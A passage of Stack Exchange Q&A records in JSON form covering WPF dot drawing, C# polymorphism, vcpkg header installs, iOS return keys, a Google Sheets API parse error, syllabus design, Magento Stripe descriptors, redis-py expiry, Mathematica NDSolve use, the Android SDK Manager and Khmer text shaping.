x_canvas.Children.Add( img );\n int width = (int)x_canvas.ActualWidth;\n int height = (int)x_canvas.ActualHeight;\n\n \/\/ Create the bitmap, and set\n WriteableBitmap wb = new WriteableBitmap(\n width,\n height,\n 96, 96,\n PixelFormats.Bgra32,\n null \n );\n\n img.Source = wb;\n img.Stretch = Stretch.None;\n img.HorizontalAlignment = HorizontalAlignment.Left;\n img.VerticalAlignment = VerticalAlignment.Top;\n Canvas.SetZIndex( img, -100 );\n\n \/\/ Each \"dot\" is 2x2 rectangle\n Int32Rect rect = new Int32Rect( 0, 0, 2, 2 );\n int size = rect.Width * rect.Height * 4;\n byte[] pixels = new byte[ size ];\n\n \/\/ Setup the pixel array\n for( int i=0; i<rect.Height*rect.Width; ++i ) {\n pixels[ i*4 + 0 ] = 255; \/\/ Blue\n pixels[ i*4 + 1 ] = 0; \/\/ Green\n pixels[ i*4 + 2 ] = 0; \/\/ Red\n pixels[ i*4 + 3 ] = 255; \/\/ Alpha\n }\n\n wb.WritePixels( rect, pixels, rect.Width*4, 0 );\n\n int step = 5;\n for( int r = 0; r<height; r+=step ) {\n for( int c = 0; c<width; c+=step ) {\n rect.X = c;\n rect.Y = r;\n wb.WritePixels( rect, pixels, rect.Width*4, 0 );\n }\n }\n}\n\nprivate void drawGrid1( ) {\n int step = 10;\n for( int i=0; i<1024; i+=step ) {\n for( int j=0; j<1024; j+=step ) {\n Ellipse l = new Ellipse( );\n if( i%100==0 && j%100==0 ) {\n l.Width = 4;\n l.Height = 4;\n }\n else {\n l.Width = 2;\n l.Height = 2;\n }\n l.Fill = new SolidColorBrush( Colors.Black );\n Canvas.SetTop( l, i );\n Canvas.SetLeft( l, j );\n Canvas.SetZIndex( l, -100 );\n this.x_canvas.Children.Add( l );\n }\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"What's the optimum way to draw high number of dots?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using a method from inherited class through base class\n\nQuestion: So I couldn't exactly find an answer anywhere.\nI have an entity class from which I create all my characters in the game. eg: Player inherits Entity.\nNow what I want to do, is call the \"Update\" method in Player from the entity class. Is this possible? Because I need to do this for every new entity type I create now:\n<code> foreach (Entity entity in entityList) {\n if (entity is Zombie) {\n Zombie zombie = (Zombie)entity;\n zombie.Update();\n }\n \/\/new character here\n }\n<\/code>\nThanks in advance!\nComment: Right, sorry about that.\nAnswer: If the concept of \"update\" applies to all entities, you could make <code>Update<\/code> a virtual function of <code>Entity<\/code> and let <code>Player<\/code> override it. Then, inside member functions of <code>Entity<\/code> you would just have to invoke <code>Update()<\/code> on the particular <code>Entity<\/code> object and let the call be dispatched dynamically:\n<code>foreach (Entity entity in entityList) { entity.Update(); }\n<\/code>\nIf <code>Update()<\/code> does not make sense for all <code>Entity<\/code>s, then having them as a virtual function of <code>Entity<\/code> would pollute the interface of that class, and it seems to me that your choice is correct. \nYou may also consider using the Visitor Pattern if you want to avoid the dynamic downcasts.\nAnswer: Override the <code>Update()<\/code> method in your subclasses. Then, just call <code>entity.Update()<\/code> for any encountered entity. This is what's called polymorphism.\n","meta":{"source":"stackoverflow","title":"Using a method from inherited class through base class","dup_signals":{}},"subset":"stackexchange"} +{"text":"How\/Which directory to install a 3rd party C++ library on Ubuntu?\n\nQuestion: I'm just beginning to learn more about Linux as I'm using Ubuntu.\nI'm trying to install a header-only library called \"date.h\" from here\nAn excerpt from the github states that this is a header-only library\n\n\"date.h\" is a header-only library which builds upon <chrono>. It adds some new duration types, and new time_point types. It also adds \"field\" types such as year_month_day which is a struct {year, month, day}. And it provides convenient means to convert between the \"field\" types and the time_point types.\n\n<code>git clone https:\/\/github.com\/Microsoft\/vcpkg.git\ncd vcpkg\n.\/bootstrap-vcpkg.sh\n.\/vcpkg integrate install\nvcpkg install date\n<\/code>\nI followed the above instruction and now I have <code>\/home\/username\/vcpkg\/<\/code> with many other directories underneath it.\nI navigated to <code>\/home\/username\/vcpkg\/installed\/x64-linux\/include\/date<\/code> and found <code>date.h<\/code> and <code>tz.h<\/code>, which I were looking for.\nI'm trying to use them in a C++ project but I'm not sure how to tell the compiler where to find the header files. Should I cut\/copy paste <code>\/date<\/code> directory into <code>\/user\/include\/c++\/9<\/code>, or <code>\/usr\/local\/include<\/code>, or <code>\/usr\/local\/include\/x86_64-linux-gnu<\/code>? or should I do none of those? Am I supposed to define the path to the library in my files\/makefile somehow?\nThank you\nComment: I just throw header-only libraries directly in the source tree of the project that's using it. Failing that, `\/usr\/local\/include`.\nComment: What type of project is this? How do you build it?\nAnswer: You just need to pass VCPKG toolchain file to CMake:\n<code>cmake -B build -DCMAKE_TOOLCHAIN_FILE=~\/vcpkg\/scripts\/buildsystems\/vcpkg.cmake\ncmake --build build \n<\/code>\nPlease adjust DCMAKE_TOOLCHAIN_FILE to your VCPKG installation path.\nIf you would like to use VCPKG manifest mode (with file that describes all dependent libraries), just add one more parameter \"-DVCPKG_FEATURE_FLAGS=versions\":\n<code>cmake -B build -DCMAKE_TOOLCHAIN_FILE=~\/vcpkg\/scripts\/buildsystems\/vcpkg.cmake -DVCPKG_FEATURE_FLAGS=versions\ncmake --build build \n<\/code>\n","meta":{"source":"stackoverflow","title":"How\/Which directory to install a 3rd party C++ library on Ubuntu?","dup_signals":{}},"subset":"stackexchange"} +{"text":"dynamically change UIKeyboards return key\n\nQuestion: I have two UITextfield the user enters his name into the first and email into the second. I would like to know how to change the UIKeyboards return key depending if the name text field has an entry or not.\nFor instance if nametextfield is empty then I would like the UIkeyboard return key to be Next\nelse if the nametextfield has an entry in it then when the user selects the email text field I would like the return key to be submit.\nIs this possible? if so how would I go about accomplishing it? any help would be appreciated.\nAnswer: You can have return key customized to prefixed values that you can see in <code>UIReturnKeyType<\/code> enum for each <code>UITextField<\/code>.\n<code>textFieldName.returnKeyType = UIReturnKeyNext;\ntextFieldEmail.returnKeyType = UIReturnKeyDefault;\n<\/code>\nNot sure if this is what you're looking for though.\nComment: oh yup thats pretty much it, but I am not sure where to put this code?\nComment: for instance what method is called when you enter the uitextfield? or is there another place I can put it?\nComment: you usually put it in viewDidLoad of your view controller, but depends on your specific case (are your text fields fully created at that time or do you do it at a later stage, for example).\nComment: my textfields are created as soon as the app loads.. but its not till later that the user enteres a name and email.. the thing I am confused by is how do i decide what return button to show at viewdid load if i dont know if a name is entered untill the user enteres it.... I hope this makes sense.\nAnswer: You have a chance to set up keyboard characteristics in the UITextFieldDelegate Protocol method textFieldShouldBeginEditing: which is called before the text field becomes the first responder (indeed to decide if it may become the first responder). If you don't already have a delegate for the text field(s) in question you would have to assign one and implement at least that method. Presumably the same object handling the text field could hold the delegate methods. The following implementation sets the return key to \"Search\".\n<code>- (BOOL) textFieldShouldBeginEditing:(UITextField *)textField {\n NSLog(@\"textFieldShouldBeginEditing\");\n textField.returnKeyType = UIReturnKeySearch;\n return YES;\n}\n<\/code>\nYou'd have to look at the contents of your text fields to decide what value to use.\nAnswer: Make use of the textField.returnKeyType property. \nyou can check out all the available options here http:\/\/developer.apple.com\/library\/ios\/documentation\/uikit\/reference\/UITextInputTraits_Protocol\/Reference\/UITextInputTraits.html#\/\/apple_ref\/doc\/c_ref\/UIReturnKeyType\nAnswer: textfield.returnKeyType = UIReturnKeySearch;\n","meta":{"source":"stackoverflow","title":"dynamically change UIKeyboards return key","dup_signals":{}},"subset":"stackexchange"} +{"text":"SyntaxError: Unterminated string in JSON at position 52428390 when JSON.parse() result of google sheets api call\n\nQuestion: I'm building a Google Apps Script web app, and i need to retrieve data from a spreadsheet.\n<code>function testOther() {\n var spreadsheetId = \"spreadsheetID\";\n var range = \"'PERMISSIONS'!A1:G\";\n var token = ScriptApp.getOAuthToken();\n var url = \"https:\/\/sheets.googleapis.com\/v4\/spreadsheets\/\" + spreadsheetId + \"\/values\/\" + range + \"?majorDimension=ROWS&valueRenderOption=FORMULA\";\n\n var request = {\n method: \"get\",\n url: url,\n headers: { Authorization: \"Bearer \" + token },\n muteHttpExceptions: true,\n };\n var response = UrlFetchApp.fetch(url, request);\n var jsonResponse = JSON.parse(response.getContentText());\n}\n<\/code>\nThe result in string looks like this, and values can contain hundreds of thousands results:\n<code>{\n \"range\": \"PERMISSIONS!A1:G491462\",\n \"majorDimension\": \"ROWS\",\n \"values\": [\n [\n \"ID\",\n \"Title\",\n \"Type\",\n \"Email\",\n \"Role\",\n \"Inherit\",\n \"From\"\n ],\n [\n \"val1\",\n \"val1\",\n \"val1\",\n \"val1\",\n \"val1\",\n true,\n \"val1\"\n ],\n [\n \"val2\",\n \"val2\",\n \"val2\",\n \"val2\",\n \"val2\",\n true,\n \"val2\"\n ], \n ...\n]}\n<\/code>\nMy final goal is to have a variable that contains the value of the key \"values\". I'm facing this issue :\n\nSyntaxError: Unterminated string in JSON at position 52428390\n\nEDIT : the result is actually truncated, so the error message is relevant. There seems to be a limitation with the google spreashsheets api\nComment: I have to apologize for my poor English skill. Unfortunately, I cannot understand your expected values from `My final goal is to have a variable that contains the value of the key \"values\"`. In order to correctly understand your question, can you provide the sample output values you expect? By the way, from your error message, what is the total number of cells in your Google Spreadsheet? I'm worried that the number of cells might be large. First, I would like to correctly understand your question.\nComment: I can't help but think there might be a more suitable approach to your problem than attempting to JSON.parse a 52MB+ response\nComment: `UrlFetchApp.fetch(url, request)` returns a Promise. You cannot immediately call JSON.parse like that. Either convert the outermost function to `async function` and use `await` or use `response.then(res => JSON.parse(res.getContextText()))`\nComment: @ibrahimtanyalcin sorry but for the second solution i get ```TypeError: response.then is not a function```\nComment: @Tanaike I provided the sample of output i receive. The content of the key \"values\" in the response is what i want to add to a variable, but for the moment i can\"t parse the result as JSON\nComment: I didn't know what `UrlFetchApp` is. Documentation is [here](https:\/\/developers.google.com\/apps-script\/reference\/url-fetch\/http-response#getContentText(String)). Try doing `response.getContentText(\"UTF-8\")`\nComment: @ibrahimtanyalcin i think you didn't get my point. I do receive the result in string. My problem is that i can\"t parse it into JSON because it fails\nComment: I get your point, JSON.parse might not work either because the enconding is ASCII or else there is fauly encoding of a character like French characters etc. It is worth a try, read the docs.\nComment: @ibrahimtanyalcin i did ```Logger.log(JSON.parse(response.getContentText(\"UTF-8\")));``` and still same error unfortunately\nAnswer: Looked like there was a size limit with the api response, so it was returning a truncated response.\n","meta":{"source":"stackoverflow","title":"SyntaxError: Unterminated string in JSON at position 52428390 when JSON.parse() result of google sheets api call","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should school syllabus include chapters partially?\n\nQuestion: In my locality, many schools have this tendency to partially include this and that chapter in the syllabus (for almost every subject). For example, (most of the chapters are subdivided in two or more parts), they will take chapter 2, chapter 3.1, chapter 5.1, .2, chapter 14 and make this as a syllabus for a term\/semester (out of 15 chapters, say). They complete the full textbook in a whole year, by the way.\nNow, the textbook is actually well organised, and a student would understand the topics better if the syllabus followed the order the book is written. The concept of syllabus selection committee is to 'mix hard and easy chapters (parts)' and 'to give different tastes'. In my opinion, the hard parts do not need more work once the prerequisite chapters are done; I mean if you go step by step through the text book, it is always the same amount of difficulty. And for the 'taste', if we keep tasting this and that food frequently, we do not get any taste at all.\nSo my question is: \n\nIs this normal in other places\/countries too? If so, how does this practice benefit the students in learning (mathematics)?\nComment: *if you go step by step through the text book, it is always the same amount of difficulty* --- As someone who mostly self-learned all of school algebra, precalculus, single and multivariable calculus, some linear algebra, and some differential equations by going step by step, partially or fully (mostly partially, until I found a book that worked for me), roughly 12 to 15 textbooks during my high school years, not to mention all the self-study I've done since ([recent example](https:\/\/math.stackexchange.com\/a\/141160\/13130)), I strongly disagree with your statement.\nComment: @Kawrno, are you sure of their motivations in how they split things? That sounds very odd. Many times textbooks are not organized the best way. I go out of order in Calculus, and in Precalculus, because I want the order to make sense, and the book's order doesn't. I'm sure it frustrates students sometimes. If I had the time to write a new calculus textbook, I think I would.\nComment: Personally, I am of the opinion that if you are going to use a book, then you should follow the topic outline of the book. If you don't like the order in which topics are laid out, find a different book (or write your own; or produce your own lecture notes; or, at the very least, regard the text as an \"optional\" resource and make it very clear that you aren't following it carefully). I suspect that this is an opinion shared by many, but I don't have the citations or experience to feel comfortable providing an answer.\nComment: In the ideal world \u2014 which happens to be the world that I was educated in \u2014 grade school textbooks are not 1000+ page bricks but sub-200 page books with large enough typeface, with well thought out sequencing of chapters, where each chapter has theoretical part, definitions, proofs, examples, and then a bunch of exercises. The complete book must be covered in a school year, first to last page, no omissions. Makes it easy for teachers, pupils and parents. College books are more of a mixed bag, and college profs tend to design their own courses, so selecting chapters is ok.\nComment: *Now, the textbook is actually well organised, and a student would understand the topics better if the syllabus followed the order the book is written.* Citation needed? Obviously not everyone agrees with this assertion, which is why they cover the syllabus in a different order.\nComment: @RustyCore In the context I grew up in, we didn't really use textbooks. We were taught material by our teachers, with books (definitely under 200 pages!) mostly providing practice questions, if used at all.\nComment: @JessicaB This is one of the flaws of the American school system where too much depends on a teacher \u2014 you never know what and how will be taught. This approach works for college, where profs create and refine their lectures. Richard Feynman created his course on computation in 1981, updated it over several years, had it taped in 1985; the book was printed in 1996. A good course ultimately becomes a book to reach a wider audience. This is what school books should be: carefully prepared, well-ordered essential material, that can be used for self-study no matter how incompetent a teacher is.\nComment: @RustyCore I beg to differ. This is one of the strengths of the UK system. Teaching is designed by people who know the students. Teachers don't get free reign over the content - that's set by the national curriculum - but the way it is taught is adapted by the school to suit the context. Reading straight from a textbook is not a good method of learning for most students.\nComment: @JessicaB Well, at lest in the U.K. you have national curriculum. No, I did not mean literally reading from the book, the book is a backup for missed days and bad teachers. I guess we are on the same page here.\nAnswer: My sense is that often authors are encouraged (required?) by publishers to make books very 'complete'. This means the book has all the topics that any instructor would be likely to want for a subject. However, it also means that books are often too big to entirely cover in a semester (or year). Thus an instructor must pick and choose chapters\/sections based on the goals\/objectives of their particular course. So depending on what is to be accomplished in the class, a certain amount of selection from the book is likely to occur, and may result in some topics in the book being skipped or being covered out of order.\nTo answer one of your specific questions, I don't think this particularly benefits students, except for perhaps giving them material for further self-study if the entire book didn't get covered during the course.\nAnswer: Yes they do so in many places, I think the point is that the students are forced to finish a certain curriculum (depends on the country ofcourse), for example when students finish the $9^{th}$ grade they must know this and this and that.\nSo in the years before the $9^{th}$ grade the teachers focus on what have to be finished and leave the other topics that are in the book either because they are not in the curriculum, or because they see that this topic is hard for students in this age so they explain it in the year after, and sadly there is another reason also, most teachers just ask the older teachers what they explain and in which order and do just the same just because the other teachers that used to teach before them do it.\nBut as a benefit for students, I think there isn't really any benfit, and that is why all around the world you see students and teachers, that wisely think about this issue, complaining about the curriculum and that it must be changed. \nI am not so sure about this, but I think the ministries of education put the curriculum right? So the question is, are there really qualified people in these ministries to specify what the Mathematics curriculum should and should not include? I don't think so myself, and I see that this is the problem.\nAnswer: I tend to see this in upper level college courses a lot. My impression is that the schools are trying to appear to have a solid course by using an iconic textbook (not often the best pedagogically). Often the course is too short to really cover the content properly. \nI don't like the practice. Prefer to spend more time or more realistically, use a book tailored for the course length. But I understand the psychological basis in having shorter courses using iconic, much too long texts. It's the normal human desire to look fancier than one is.\nAnswer: Also, realize that many authors write \"complete\" (self-contained) texts, and by their own recommendations, may suggest various ways an instructor may want to approach the subject. \nFor example, an author of a text with 13 chapters, may suggest, in the event that an instructor is focusing on foo, to focus on chapters 1 - 3, chapter 4 (sections 1-3), and chapters 7, 9, 10. Occasionally, an instructor may designate two or three chapters and their sections to be addressed by students in presentations, or in a semester paper, based on the foundation of the text that's covered in class.\nThis is a common practice in classes, because some texts cannot be thoroughly covered in one or two semesters.\n","meta":{"source":"matheducators.stackexchange","title":"Should school syllabus include chapters partially?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Magento credit card statement shows \"store id 1\"\n\nQuestion: I am using Magento with the netgains stripe module, everything is working fine. However when an order is processed the credit card statement shows the transaction as affiliated to \"store id 1\" how can i change this so the store name is displayed instead of this store id 1 information on the credit card statement\nThanks in advance\nAnswer: You may have figured out the answer to this now but if you haven't I can shed some light.\nIn app\/code\/local\/Netgains\/Stripe\/Model\/Stripe.php on Line 146 you'll see this:\n<code> $storeId = 'Store Id'.' '.Mage::app()->getStore()->getId();\n<\/code>\nYou can change 'Store Id' to the name of your site\/company and it will then show up on the customer's statement descriptor.\n","meta":{"source":"stackoverflow","title":"Magento credit card statement shows \"store id 1\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"redis-py pipeline hset not saving\n\nQuestion: I have set a <code>pipeline<\/code> on redis-py to save 2 diferent hashes\n<code>p = self.app.redis.pipeline()\nkey_id = '{}{}'.format(self.prefix,article.id)\nkey_url = '{}{}'.format(self.prefix,article.url)\n\n# add the common fields from the ArticleModel\np.hset(key_id, 'shortUrl', shortUrl)\np.hset(key_url,'shortUrl', shortUrl)\nfor k in article.__table__.columns:\n k = k.name\n if k not in ['url','id']:\n p.hset(key_id, k, article.__getattribute__(k))\n p.hset(key_url, k, article.__getattribute__(k))\n\n# add the different fields and finish the transaction\np.hset(key_id, 'url', article.url)\np.hset(key_url, 'id', article.id)\np.expireat(key_id, self.expiration_window)\np.expireat(key_url, self.expiration_window)\np.execute()\n<\/code>\nThe pipeline before executing is:\n<code>[(('HSET', 'article\/1', 'shortUrl', 'qp'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'shortUrl', 'qp'), {}), (('HSET', 'article\/1', 'title', u'Full pytest documentation'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'title', u'Full pytest documentation'), {}), (('HSET', 'article\/1', 'authors', u''), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'authors', u''), {}), (('HSET', 'article\/1', 'html', u'<p>Enter search terms or a module, class or function name.<\/p>\\n'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'html', u'<p>Enter search terms or a module, class or function name.<\/p>\\n'), {}), (('HSET', 'article\/1', 'plaintext', u'Enter search terms or a module, class or function name. '), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'plaintext', u'Enter search terms or a module, class or function name. '), {}), (('HSET', 'article\/1', 'markdown', u'Enter search terms or a module, class or function name.\\n\\n'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'markdown', u'Enter search terms or a module, class or function name.\\n\\n'), {}), (('HSET', 'article\/1', 'date', datetime.datetime(2014, 12, 5, 19, 2, 30, 752183)), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'date', datetime.datetime(2014, 12, 5, 19, 2, 30, 752183)), {}), (('HSET', 'article\/1', 'url', u'http:\/\/pytest.org\/latest\/contents.html'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'id', 1), {}), (('EXPIREAT', 'article\/1', 604800), {}), (('EXPIREAT', 'article\/http:\/\/pytest.org\/latest\/contents.html', 604800), {})]\n<\/code>\nAnd the answer is:\n<code>[1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, True, True]\n<\/code>\nSo it seems that it is saving the 16 keys.\nWhen executing <code>self.app.redis.keys('*')<\/code> it does not bring any key nor when executing <code>self.app.redis.hget('article\/1')<\/code>\nAny thing I am missing?\nAnswer: Found the problem\nbasically it was the expiration window that was only considering 7 days, but not from now. It was from the beginning of the time, around 1970...\n","meta":{"source":"stackoverflow","title":"redis-py pipeline hset not saving","dup_signals":{}},"subset":"stackexchange"} +{"text":"Swift ios 10 NavBar Item keeps growing\n\nQuestion: I have a navBar Controller connected to a UIView, I have a right bar button item that is a chevron. I have programmatically created a search bar. If you click the chevron about 20-100 times it keeps growing until it is off the screen. I can see each time I click the chevron a slight bump in my search bar. Since you can not place constraints on navBar and fixed Space bar button item does not work either. Any suggestions on where to look or how to fix this?\n<code>func rotateChevron(animated: Bool = true) {\n let chevAnimate = animated ? 0.3 : 0.0\n let chevIsDown = messagePicker.frame.origin.y == self.view.frame.height - (tabBarController?.tabBar.frame.height ?? 0)\n let rotation: CGFloat = chevIsDown ? 0.0 : 180.001\n UIView.animate(withDuration: chevAnimate, animations: {\n self.filterChevron.customView?.transform = CGAffineTransform(rotationAngle: rotation.degreesToRadians)\n }, completion: nil)\n}\n<\/code>\nAnswer: After some research I placed within the animation blocks a forced CGSize (w\/h) and this seems to have solved the issue. I also found that transform animation should not be used with frames because it moved the bounds of the image each time which is why the chevron was acting up.\n<code>func rotateChevron(animated: Bool = true) {\n let chevAnimate = animated ? 0.3 : 0.0\n let chevIsDown = messagePicker.frame.origin.y == self.view.frame.height - (tabBarController?.tabBar.frame.height ?? 0)\n let rotation: CGFloat = chevIsDown ? 0.0 : 180.001\n filterChevron.customView?.frame.size = CGSize(width: 35, height: 30)\n UIView.animate(withDuration: chevAnimate, animations: {\n self.filterChevron.customView?.transform = CGAffineTransform(rotationAngle: rotation.degreesToRadians)\n }, completion: nil)\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Swift ios 10 NavBar Item keeps growing","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to implement two months calendar using android\n\nQuestion: \nI want to implement two month calendar in my android application like below image,\n\ni tried to get by googling but cant get any source code for two months calendar,Pls give source code for two months calendar if any... Awaiting for your replies...\nAnswer: \nIt is possible to implement two months calendar using the grid view. The main advantage of the grid view is , it having autoscroll property default.So try to use gridview on your android xml. Refer code below,\n\n<code><GridView\n android:id=\"@+id\/calendar\"\n android:numColumns=\"7\" \n android:layout_width=\"fill_parent\"\n android:layout_height=\"wrap_content\">\n<\/GridView>\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to implement two months calendar using android","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use answer of NDSolve in NIntegrate\n\nQuestion: <code>a = 3; Tau = 100; T0 = 1\/2; g0 = Tanh[2\/T0];\nz0 = (1 - g0) Tau;\ns = NDSolve[{D[G[q, x], x] + (2 z0 (1 - x)^a + q^2) G[q, x] == \nSqrt[2\/Pi] q, G[0, x] == 0, G[10, x] == 0.0795932, G[q, 0] == 0.797885 q\/(q^2 + 2 z0)}, G[q, x], {q, 0, 10}, {x, 0, 1}, AccuracyGoal -> 20]\n Plot[(G[q, x]) \/. s \/. q -> 0.5, {x, 0, 1}]\nP[y_, x_] := Sqrt[2\/Pi] NIntegrate[Sin[q y]*G[q, x], {q, 0, 10}, AccuracyGoal -> 20]\n<\/code>\nHere, I want to use the G[q,x] from the NDSolve, as solution in the NIntegrate code of P[y,x]. But I am not able to understand how to call it. This code is working till Plot of G[q,x]. But P[y,x] is giving a lot of errors.\nComment: For example, use `G` in `NDSolve`. `a = 3; Tau = 100; T0 = 1\/2; g0 = Tanh[2\/T0];\nz0 = (1 - g0) Tau;\nsol = NDSolve[{D[G[q, x], x] + (2 z0 (1 - x)^a + q^2) G[q, x] == \n Sqrt[2\/Pi] q, G[0, x] == 0, G[10, x] == 0.0795932, \n G[q, 0] == 0.797885 q\/(q^2 + 2 z0)}, G, {q, 0, 10}, {x, 0, 1}, \n AccuracyGoal -> 20]; \nP[y_, x_] := \n Sqrt[2\/Pi] NIntegrate[Sin[q y]*G[q, x] \/. sol[[1]], {q, 0, 10}, \n AccuracyGoal -> 20]; P[3, 2]`\nComment: It works, thank you so much\nAnswer: Try and see if this works for you.\nBtw, you are also getting\n<code> NDSolveValue::ibcinc: Warning: boundary and initial conditions are inconsistent.\n<\/code>\nwhich you might want to fix.\n<code>ClearAll[\"Global`*\"]\na = 3; Tau = 100; T0 = 1\/2; g0 = Tanh[2\/T0];\nz0 = (1 - g0) Tau;\nsolG = NDSolveValue[{D[G[q, x], x] + (2 z0 (1 - x)^a + q^2) G[q, x] == \n Sqrt[2\/Pi] q, G[0, x] == 0, G[10, x] == 0.0795932, \n G[q, 0] == 0.797885 q\/(q^2 + 2 z0)}, G, {q, 0, 10}, {x, 0, 1}, \n AccuracyGoal -> 20]\n\nPlot[solG[0.5, x], {x, 0, 1}]\n<\/code>\n\n<code>P[y_, x_] := Sqrt[2\/Pi] NIntegrate[Sin[q y]*solG[q, x], {q, 0, 10},AccuracyGoal -> 20]\n<\/code>\nand now\n<code> P[1, 2]\n<\/code>\n\n<code>Plot[P[2, x], {x, 0, 1}]\n<\/code>\n\nI also think it will be better\/safer to define your <code>P<\/code> as\n<code>P[y_?NumericQ, x_?NumericQ]\n<\/code>\nSince <code>y,x<\/code> could only be numerical for things to work, because you are using <code>NIntegrate<\/code>.\n","meta":{"source":"mathematica.stackexchange","title":"How to use answer of NDSolve in NIntegrate","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why won't my Android SDK Manager show up when invoked from Eclipse?\n\nQuestion: On Ubuntu 12.04, I'm running the Eclipse IDE with the standalone Android SDK plugins installed. I'm using it this way instead of using the ADT Bundle because I'm also using Eclipse for other code.\nIf I try to invoke the Android SDK Manager from the Eclipse Window menu, then I get the happy message about \"SDK Manager will show up shortly...\", but when that status window goes away, the SDK Manager has not, in fact, started.\nI do have a workaround, for now. If I open a terminal window and invoke the tool directly...\n<code>>> \/opt\/android-sdk-linux\/tools\/android\n<\/code>\nThe SDK manager happily opens. No errors are returned. Changes to the Android SDK environment made here persist and function as expected. While this works, it's strange and spooky; I'd rather have it also work within the IDE.\nAs a nicer workaround, I tried constructing a Gnome <code>.desktop<\/code> file to invoke the executable directly, but when I try to use that, nothing happens, and no errors are visible.\nEven stranger, the Android Virtual Device Manager works just fine when invoked from within Eclipse. Only the SDK Manager is affected by this...whatever it is.\nI have seen elsewhere that the Android tools might require Java 6, but I can't change Eclipse's Java path in <code>eclipse.ini<\/code> without also clobbering use of Java 7 in the rest of Eclipse, so this doesn't seem like a viable option.\nWhat else can I try, or what am I missing, that would make the SDK Manager behave in Eclipse?\nAnd before I get flagged as a duplicate of the following questions, I've already read them and tried some things without success:\n\nAndroid sdk manager not showing up ( Ubuntu )\n\nI already installed the official Oracle JDKs and don't want to mess with installing the OpenJDK again and dealing with conflicts, etc.\n\nhttps:\/\/askubuntu.com\/questions\/386392\/problem-in-opening-sdk-manager-in-eclipse\n\nAll my paths are set correctly, and I don't get any errors when invoking from the terminal.\n\nAndroid SDK manager not opening\n\nI don't get an error message on the terminal.\nComment: what is the output of `ls -l \/opt\/android-sdk-linux\/tools\/android.\n`\nAnswer: Welp, just found a solution. Or maybe it's just another workaround. Whatever.\n<code>>> cd \/usr\/bin\/\n>> sudo ln -s \/opt\/android-sdk-linux\/tools\/android android\n>> which android\n\/usr\/bin\/android\n<\/code>\nThe fact that this works suggests that, even if the <code>tools<\/code> directory is properly within my path, Eclipse can't find it unless it's also in <code>\/usr\/bin\/<\/code>. Strange. Oh, well.\n","meta":{"source":"askubuntu","title":"Why won't my Android SDK Manager show up when invoked from Eclipse?","dup_signals":{}},"subset":"stackexchange"} +{"text":"OpenType - Two Khmer chars become three before mapping to glyph Ids\n\nQuestion: I have an interesting problem with processing Khmer text.\nThe text \"\u1780\u17be\" is a string of length two in Unicode. See snipped below for the char codes.\n\n<code>let textbox = document.getElementById('textbox');\nlet info = document.getElementById('info');\n\nlet text = \"\u1780\u17be\"\n\ntextbox.setAttribute('value', text);\n\ninfo.innerHTML = \"length: \" + text.length + \"<br>codes: \" + text.split('').map(c => c.charCodeAt(0))<\/code>\n<code><input id=\"textbox\" type=\"text\" style=\"font-size:80px; width: 2em;\"\/>\n<div id=\"info\"><\/div><\/code>\n\nText renderers seem to compose this text of three glyphs, or replace the three characters with ligatures. So far this is exotic but not unexpected.\nHere is the puzzling thing: When I type this text into the Crowbar text shaping debugger at http:\/\/www.corvelsoftware.co.uk\/crowbar\/ using the Khmer font from Google Fonts, one can see that the two characters are mapped to three glyphs. But the two characters seem to become three characters even before the mapping. Character 6081 appears out of thin air.\n\nI took a deep dive into the internals of the font file, and there is only one subtable in the <code>cmap<\/code> table, which maps character codes to glpyh ids. This table has format 4, which is pretty standard and only allows one-to-one mappings, so there is no additional glyph inserted during <code>cmap<\/code> processing.\nAlso, if only the two original char codes are mapped to glyphs, the resulting text will look different, so the third character seems to be necessary.\nWhat step am I missing here that adds the third character before the character to glyph id mapping? There seems to be some preprocessing of the text taking place that I am not aware of.\nComment: You should check shaping engines, e.g. https:\/\/harfbuzz.github.io\/ (there are few other: one of Microsoft, one of Mac and SIL). These translate strings (and font information) in position and glyphs. It is a complex topic, which I have not yet mastered.\nComment: This seems to be a science on its own. Here is an article describing in detail how Khmer fonts are created: https:\/\/learn.microsoft.com\/en-us\/typography\/script-development\/khmer\nTHere is actually some preprocessing going on, such as adding a character before vowels.\nComment: I do not know all the details, but stage 1 is to normalize a string. Unicode code point have different normalization. It is very probable that they just do a decomposition, because it is much better to deal diacritics separately (they follow other rules)\nComment: @GiacomoCatenazzi Thanks, i will look into this. There is a Javascript normalize() function for strings. But so far I could not make do what I was hoping for.\nComment: I'd also recommend asking this over on https:\/\/typedrawers.com, instead, since that's where all the font folks hang out.\nComment: You might wrote using wrong vowel:\n\u1780\u17be and \u1780\u17c1\u17b8 these two are different\nAnswer: As @Waruyama suggested, the answer is documented in https:\/\/learn.microsoft.com\/en-us\/typography\/script-development\/khmer. It is buried in the entry for 'Vowel' in the glossary there, and says\n\nThe shaping engine will take care of pre-pending the syllable, with the glyph piece shaped like U+17C1.\n\nBy 'syllable', the specification means the first part of these vowels, which has the same shape as U+17C1 KHMER VOWEL SIGN E. Therefore HarfBuzz expands the input string from <U+1780, U+17BE> to <U+1780, U+17C1, U+17BE>. At this point, the font has been consulted only to confirm that it has GSUB instructions for the Khmer script. Next, it applies the cmap table from the font.\nAnswer: You might wrote using wrong vowel:\n<code>\u1780\u17be (U+1780U+17BE)<\/code> and <code>\u1780\u17c1\u17b8 (U+1780U+17C1U+17B8)<\/code> : these two are different.\nAs if using wrong key of vowel, the glyph still appear as the same but they are constructed from different key.\nTry with this 